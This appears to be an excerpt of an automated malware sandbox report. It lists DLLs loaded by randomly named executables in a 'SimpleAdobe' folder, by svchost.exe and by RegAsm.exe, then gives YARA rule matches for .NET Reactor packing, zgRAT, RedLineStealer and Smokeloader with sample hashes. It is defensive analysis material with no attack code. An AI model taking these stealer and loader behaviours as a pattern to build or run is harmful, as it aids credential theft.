Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Section loaded: sppc.dll
Source: C:\Users\user\Documents\SimpleAdobe\tiToqF4gUiKaoPfx2yS40yxZ.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Section loaded: mscoree.dll
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Section loaded: version.dll
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Section loaded: wldp.dll
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Section loaded: profapi.dll
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Section loaded: dwrite.dll
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Section loaded: textshaping.dll
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Section loaded: wintypes.dll
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Section loaded: wintypes.dll
Source: C:\Users\user\Documents\SimpleAdobe\6JHxagCVExT6_J_NgFfNr8iE.exe	Section loaded: wintypes.dll
Source: C:\Users\user\Documents\SimpleAdobe\DcuyIDqrnrOUlJGUzTDFRaZm.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Documents\SimpleAdobe\DcuyIDqrnrOUlJGUzTDFRaZm.exe	Section loaded: msimg32.dll
Source: C:\Users\user\Documents\SimpleAdobe\DcuyIDqrnrOUlJGUzTDFRaZm.exe	Section loaded: msvcr100.dll
Source: C:\Users\user\Documents\SimpleAdobe\xDVBd5GtHhrlSm0slOnr7_gW.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Documents\SimpleAdobe\xDVBd5GtHhrlSm0slOnr7_gW.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\Documents\SimpleAdobe\xDVBd5GtHhrlSm0slOnr7_gW.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\Documents\SimpleAdobe\xDVBd5GtHhrlSm0slOnr7_gW.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\Documents\SimpleAdobe\xDVBd5GtHhrlSm0slOnr7_gW.exe	Section loaded: winhttp.dll
Source: C:\Users\user\Documents\SimpleAdobe\xDVBd5GtHhrlSm0slOnr7_gW.exe	Section loaded: wininet.dll
Source: C:\Users\user\Documents\SimpleAdobe\xDVBd5GtHhrlSm0slOnr7_gW.exe	Section loaded: mswsock.dll
Source: C:\Users\user\Documents\SimpleAdobe\xDVBd5GtHhrlSm0slOnr7_gW.exe	Section loaded: devobj.dll
Source: C:\Users\user\Documents\SimpleAdobe\csscx6pq5pjO0BwzvKMjhfKE.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Documents\SimpleAdobe\csscx6pq5pjO0BwzvKMjhfKE.exe	Section loaded: acgenral.dll
Source: C:\Users\user\Documents\SimpleAdobe\csscx6pq5pjO0BwzvKMjhfKE.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Documents\SimpleAdobe\csscx6pq5pjO0BwzvKMjhfKE.exe	Section loaded: winmm.dll
Source: C:\Users\user\Documents\SimpleAdobe\csscx6pq5pjO0BwzvKMjhfKE.exe	Section loaded: samcli.dll
Source: C:\Users\user\Documents\SimpleAdobe\csscx6pq5pjO0BwzvKMjhfKE.exe	Section loaded: msacm32.dll
Source: C:\Users\user\Documents\SimpleAdobe\csscx6pq5pjO0BwzvKMjhfKE.exe	Section loaded: version.dll
Source: C:\Users\user\Documents\SimpleAdobe\csscx6pq5pjO0BwzvKMjhfKE.exe	Section loaded: userenv.dll
Source: C:\Users\user\Documents\SimpleAdobe\csscx6pq5pjO0BwzvKMjhfKE.exe	Section loaded: dwmapi.dll
Source: C:\Users\user\Documents\SimpleAdobe\csscx6pq5pjO0BwzvKMjhfKE.exe	Section loaded: urlmon.dll
Source: C:\Users\user\Documents\SimpleAdobe\csscx6pq5pjO0BwzvKMjhfKE.exe	Section loaded: mpr.dll
Source: C:\Users\user\Documents\SimpleAdobe\csscx6pq5pjO0BwzvKMjhfKE.exe	Section loaded: sspicli.dll
Source: C:\Users\user\Documents\SimpleAdobe\csscx6pq5pjO0BwzvKMjhfKE.exe	Section loaded: winmmbase.dll
Source: C:\Users\user\Documents\SimpleAdobe\csscx6pq5pjO0BwzvKMjhfKE.exe	Section loaded: winmmbase.dll
Source: C:\Users\user\Documents\SimpleAdobe\csscx6pq5pjO0BwzvKMjhfKE.exe	Section loaded: iertutil.dll
Source: C:\Users\user\Documents\SimpleAdobe\csscx6pq5pjO0BwzvKMjhfKE.exe	Section loaded: srvcli.dll
Source: C:\Users\user\Documents\SimpleAdobe\csscx6pq5pjO0BwzvKMjhfKE.exe	Section loaded: netutils.dll
Source: C:\Users\user\Documents\SimpleAdobe\csscx6pq5pjO0BwzvKMjhfKE.exe	Section loaded: aclayers.dll
Source: C:\Users\user\Documents\SimpleAdobe\csscx6pq5pjO0BwzvKMjhfKE.exe	Section loaded: sfc.dll
Source: C:\Users\user\Documents\SimpleAdobe\csscx6pq5pjO0BwzvKMjhfKE.exe	Section loaded: sfc_os.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dwrite.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msvcp140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windowscodecs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll

Source: 0.3.i1crvbOZAP.exe.29625ff5620.61.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_EXE_Packed_DotNetReactor author = ditekSHen, description = Detects executables packed with unregistered version of .NET Reactor
Source: 9.0.g1nHVnlr2tXTEWQsRz_M547D.exe.f50000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_EXE_Packed_DotNetReactor author = ditekSHen, description = Detects executables packed with unregistered version of .NET Reactor
Source: 9.0.g1nHVnlr2tXTEWQsRz_M547D.exe.f50000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0.3.i1crvbOZAP.exe.29626082c80.62.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_EXE_Packed_DotNetReactor author = ditekSHen, description = Detects executables packed with unregistered version of .NET Reactor
Source: 0.3.i1crvbOZAP.exe.29625ce8c40.11.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_EXE_Packed_DotNetReactor author = ditekSHen, description = Detects executables packed with unregistered version of .NET Reactor
Source: 0.3.i1crvbOZAP.exe.29625c9c780.26.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_EXE_Packed_DotNetReactor author = ditekSHen, description = Detects executables packed with unregistered version of .NET Reactor
Source: 0.3.i1crvbOZAP.exe.29625c1dde0.22.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_EXE_Packed_DotNetReactor author = ditekSHen, description = Detects executables packed with unregistered version of .NET Reactor
Source: 0.3.i1crvbOZAP.exe.29625f327c0.39.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_EXE_Packed_DotNetReactor author = ditekSHen, description = Detects executables packed with unregistered version of .NET Reactor
Source: 0.3.i1crvbOZAP.exe.29625cd9c00.19.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_EXE_Packed_DotNetReactor author = ditekSHen, description = Detects executables packed with unregistered version of .NET Reactor
Source: 0.3.i1crvbOZAP.exe.29625cff480.7.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_EXE_Packed_DotNetReactor author = ditekSHen, description = Detects executables packed with unregistered version of .NET Reactor
Source: 0.3.i1crvbOZAP.exe.29625f327c0.35.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_EXE_Packed_DotNetReactor author = ditekSHen, description = Detects executables packed with unregistered version of .NET Reactor
Source: 0.3.i1crvbOZAP.exe.29625cd9c00.9.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_EXE_Packed_DotNetReactor author = ditekSHen, description = Detects executables packed with unregistered version of .NET Reactor
Source: 0.3.i1crvbOZAP.exe.29625c2f140.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_EXE_Packed_DotNetReactor author = ditekSHen, description = Detects executables packed with unregistered version of .NET Reactor
Source: 0.3.i1crvbOZAP.exe.29625c1dde0.87.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_EXE_Packed_DotNetReactor author = ditekSHen, description = Detects executables packed with unregistered version of .NET Reactor
Source: 0.3.i1crvbOZAP.exe.29625bfd2a0.14.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_EXE_Packed_DotNetReactor author = ditekSHen, description = Detects executables packed with unregistered version of .NET Reactor
Source: 0.3.i1crvbOZAP.exe.29625cfe8b0.104.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_EXE_Packed_DotNetReactor author = ditekSHen, description = Detects executables packed with unregistered version of .NET Reactor
Source: 0.3.i1crvbOZAP.exe.29625d0d1e0.102.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_EXE_Packed_DotNetReactor author = ditekSHen, description = Detects executables packed with unregistered version of .NET Reactor
Source: 0.3.i1crvbOZAP.exe.29625be8caf.79.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_EXE_Packed_DotNetReactor author = ditekSHen, description = Detects executables packed with unregistered version of .NET Reactor
Source: 0.3.i1crvbOZAP.exe.29625c69d20.8.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_EXE_Packed_DotNetReactor author = ditekSHen, description = Detects executables packed with unregistered version of .NET Reactor
Source: 0.3.i1crvbOZAP.exe.29626065420.75.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_EXE_Packed_DotNetReactor author = ditekSHen, description = Detects executables packed with unregistered version of .NET Reactor
Source: 0.3.i1crvbOZAP.exe.29625bfd2a0.21.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_EXE_Packed_DotNetReactor author = ditekSHen, description = Detects executables packed with unregistered version of .NET Reactor
Source: 0.3.i1crvbOZAP.exe.29625cd9c00.25.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_EXE_Packed_DotNetReactor author = ditekSHen, description = Detects executables packed with unregistered version of .NET Reactor
Source: 44.0.fSJI2dwukNtWVEjIwlXBl7N4.exe.520000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_EXE_Packed_DotNetReactor author = ditekSHen, description = Detects executables packed with unregistered version of .NET Reactor
Source: 0.3.i1crvbOZAP.exe.29625ff5620.55.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_EXE_Packed_DotNetReactor author = ditekSHen, description = Detects executables packed with unregistered version of .NET Reactor
Source: 0.3.i1crvbOZAP.exe.29625d0d1e0.86.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_EXE_Packed_DotNetReactor author = ditekSHen, description = Detects executables packed with unregistered version of .NET Reactor
Source: 0.3.i1crvbOZAP.exe.29625bcda60.92.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_EXE_Packed_DotNetReactor author = ditekSHen, description = Detects executables packed with unregistered version of .NET Reactor
Source: 0.3.i1crvbOZAP.exe.29625c0bda0.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_EXE_Packed_DotNetReactor author = ditekSHen, description = Detects executables packed with unregistered version of .NET Reactor
Source: 0.3.i1crvbOZAP.exe.29625be8caf.109.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_EXE_Packed_DotNetReactor author = ditekSHen, description = Detects executables packed with unregistered version of .NET Reactor
Source: 0.3.i1crvbOZAP.exe.29626010da0.74.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_EXE_Packed_DotNetReactor author = ditekSHen, description = Detects executables packed with unregistered version of .NET Reactor
Source: 0.3.i1crvbOZAP.exe.29625bcda60.82.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_EXE_Packed_DotNetReactor author = ditekSHen, description = Detects executables packed with unregistered version of .NET Reactor
Source: 0.3.i1crvbOZAP.exe.29625c50820.24.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_EXE_Packed_DotNetReactor author = ditekSHen, description = Detects executables packed with unregistered version of .NET Reactor
Source: 0.3.i1crvbOZAP.exe.29625be8caf.115.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_EXE_Packed_DotNetReactor author = ditekSHen, description = Detects executables packed with unregistered version of .NET Reactor
Source: 0.3.i1crvbOZAP.exe.29625c9c780.28.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_EXE_Packed_DotNetReactor author = ditekSHen, description = Detects executables packed with unregistered version of .NET Reactor
Source: 0.3.i1crvbOZAP.exe.29625c208e0.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_EXE_Packed_DotNetReactor author = ditekSHen, description = Detects executables packed with unregistered version of .NET Reactor
Source: 0.3.i1crvbOZAP.exe.29625c168a0.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_EXE_Packed_DotNetReactor author = ditekSHen, description = Detects executables packed with unregistered version of .NET Reactor
Source: 0.3.i1crvbOZAP.exe.29625bfd2a0.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_EXE_Packed_DotNetReactor author = ditekSHen, description = Detects executables packed with unregistered version of .NET Reactor
Source: 0000000C.00000002.2507946071.0000000000CCD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000012.00000002.2162059804.0000000000B60000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000012.00000002.2163166547.0000000000B9D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000012.00000002.2162296306.0000000000B70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000D.00000002.2170856076.0000000002F70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000012.00000002.2169331111.0000000002A31000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000C.00000002.2508285953.0000000002650000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000D.00000002.2166062465.0000000002B77000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
